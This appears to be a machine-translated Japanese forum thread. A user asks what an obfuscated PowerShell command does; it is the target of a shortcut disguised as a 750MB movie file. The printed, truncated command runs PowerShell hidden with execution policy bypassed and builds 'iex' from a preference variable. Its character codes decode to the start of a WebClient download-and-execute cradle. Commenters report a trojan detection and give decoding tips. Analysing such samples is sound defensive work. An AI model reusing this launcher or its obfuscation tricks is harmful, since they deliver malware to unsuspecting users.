私は映画であるべきファイルを手に入れましたが、powershellコマンドを実行するためのショートカットであることが判明しました。詳細は次のとおりです。
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.
このpowershellコマンドが何をするのか、どこでデコードする方法の詳細を見つけることができるのか誰かにアドバイスできますか?
ありがとう
自分が何をしているかわからず、コマンドが悪意があると思われる場合は、コマンドの一部を実行しないでください。
—
ルート
ファイル(サイズが750MBで、ムービーファイルのように見える)は実際にはショートカットであり、上記のコマンドラインはショートカットのターゲットです。私はチェックしましたが、他に何もありませんので、何か足りないものがある場合は、何らかの形でペイロードに含まれている必要があります。
—
kfbnlet
早めに投稿された以前のコメント。Ran Malwarebytesは、ショートカットを実行した頃のトロイの木馬のインストールを識別していたため、マルウェアでした。
—
kfbnlet
powershell.exe /?して、最初の3つの-something項目を確認します。[2]実行( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')して、それが何であるかを確認します。エイリアスに慣れていない場合はGet-Alias、その出力で実行してください。[3]残りはおそらくbase64でエンコードされたコマンドの始まりです。すべてではないので、それを確認する方法はありません。